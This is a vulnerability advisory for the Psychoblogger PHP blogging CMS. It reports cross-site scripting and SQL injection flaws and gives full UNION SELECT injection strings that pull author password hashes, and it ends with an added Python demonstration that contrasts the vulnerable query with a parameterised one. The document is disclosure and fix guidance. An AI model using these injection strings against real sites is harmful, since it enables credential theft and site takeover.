---------------------------------------
Title: Multiple vulnerabilities in Psychoblogger CMS package
Package description (From vendor website):
"This is a PHP/MySQL blogging tool with many features."
Vendor website:
http://www.psychoblogger.com
Affected versions:
To the best of my knowledge, there is only one public release available; PB-beta1
There may or may not have been some private development done (unconfirmed).
Summary:
Psychoblogger is a CMS package aimed at providing weblogs (or 'blogs') with an easy to set up
system for editing and authoring the content.
The standard package has many inherent vulnerabilities that may allow the compromise of a web server
or website using the distributed code.
Vendor Contact:
Author contacted, advisory acknowledged, fixes to be released soon.
---------------------------------------
Vulnerabilities
VULN #1:
There is a Cross-Site-Scripting vulnerability in the script 'imageview.php',
which allows for insertion of scripting on the client-side. This can be exploited by setting
the 'desc' GET variable. This variable is printed without any checking, in between the
<title> tags.
Because scripting cannot be inserted directly into the title, one must first break out of the tag.
This can be exploited like so:
http://server.com/imageview.php?desc=
IMPACT: Low/Medium - This vulnerability may be able to be exploited to hijack the session of a currently logged-in
editor, and thus gain administrative privileges over the weblog. However, (as usual) XSS vulns are quite hard to
exploit successfully.
VULN #2
Cross-site-scripting vulnerabilities exist in the scripts 'entryadmin.php', 'authoredit.php', 'blockedit.php',
'configadmin.php' and 'quoteedit.php'. These vulnerabilities can be exploited by using a URI similar to the one below:
http://server.com/entryadmin.php?error=1&errormessage=
IMPACT: Low - These vulnerabilities may only be exploited if the user is currently logged in to the 'editor'
interface, and as such may be incredibly hard to exploit successfully.
VULN #3
A SQL-Injection vulnerability exists in 'shouts.php', through the variable 'shoutlimit'.
I have not been able to successfully exploit this vulnerability to any great extent using UNION, as the original
script query already includes an 'order by' statement. However, the severity of this vuln is still quite large,
and if anyone wishes to provide some POC code for this, please let me know =)
IMPACT: Severe - SQL-Injection vulnerabilities can be used to obtain usernames and passwords of privileged accounts
on the website.
VULN #4
Another SQL-Injection vulnerability exists in the comments.php script, using the variable 'blogid'.
By sending an HTTP 'POST' request to the file 'comments.php', with the variable 'blogid' set to the exploit string below,
an attacker could potentially obtain encrypted passwords for later brute-forcing.
The SQL injection that could exploit this vulnerability is demonstrated here:
1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
This string manipulates the SQL query into looking something like this:
select blogid,preview,entry,be.dateentered,title,pageviews,usepreview,name from blog_entries be inner join blog_authors ba on be.authorid=ba.authorid
where blogid=1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
and be.active=1
Which returns a result set that lists the user rights of the first user in the database (usually the administrator).
IMPACT: Critical - This vulnerability could allow for the stealing of encrypted passwords from the database,
which then allows them to be brute-forced.
VULN #5
A third SQL-Injection vulnerability exists in the script 'functions.php' in the method blogs() where a SQL query is built.
(Note: The actual query is executed in 'userfunctions.php', method showblogs() in the appropriate skins directory)
By sending a request to the script 'category.php', one can manipulate the string into outputting an author password.
The SQL injection that could exploit this string is thus:
1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba, blog_entries be where 1=1
This would manipulate the string into something like this:
select be.blogid,be.preview,be.entry,be.dateentered,be.title,be.pageviews,be.usepreview,ba.name,be.pinned from blog_entries be inner join blog_authors ba
on be.authorid=ba.authorid where catid=1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba,
blog_entries be where 1=1 and be.active=1 order by be.dateentered desc
IMPACT: Critical - This vulnerability might allow for the stealing of encrypted password strings from the database.
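
The following is an added example, not part of the original advisory or of Psychoblogger's code. It runs the VULN #4 query shape against a constructed SQLite stand-in for the MySQL tables, first with the request value concatenated into the SQL and then with digit validation plus a bound parameter, the fix that applies equally to the numeric parameters in VULN #3 and VULN #5. The schema, sample rows and function names are assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in schema: only the columns named in the advisory's queries,
# in SQLite instead of MySQL. The pwd value is a placeholder, not a real hash.
SCHEMA = """
create table blog_authors (authorid integer, name text, pwd text, email text,
                           url text, active integer, comments text);
create table blog_entries (blogid integer, authorid integer, preview text,
                           entry text, dateentered text, title text,
                           pageviews integer, usepreview integer, active integer);
insert into blog_authors values (1,'admin','PWD-PLACEHOLDER','a@example.test','',1,'');
insert into blog_entries values (1,1,'intro','body','2004-01-01','Hello',0,0,1);
"""

# Query shape quoted in VULN #4; {} marks where 'blogid' lands.
QUERY = ("select blogid,preview,entry,be.dateentered,title,pageviews,usepreview,name "
         "from blog_entries be inner join blog_authors ba on be.authorid=ba.authorid "
         "where blogid={} and be.active=1")

# Injection string exactly as printed in VULN #4.
PAYLOAD = ("1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,"
           "comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'")


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def fetch_entry_vulnerable(db, blogid):
    # Request value pasted into the SQL text: the flaw the advisory describes.
    return db.execute(QUERY.format(blogid)).fetchall()


def fetch_entry_hardened(db, blogid):
    # Layer 1: 'blogid' is a numeric key, so accept nothing but ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", str(blogid)):
        raise ValueError("blogid must be a positive integer")
    # Layer 2: bind the value so it can never be parsed as SQL.
    return db.execute(QUERY.format("?"), (int(blogid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fetch_entry_vulnerable(db, PAYLOAD))
    print("hardened  :", fetch_entry_hardened(db, "1"))
```

In the PHP code the same two layers are an integer cast of the request variable and a prepared statement in place of string-built SQL.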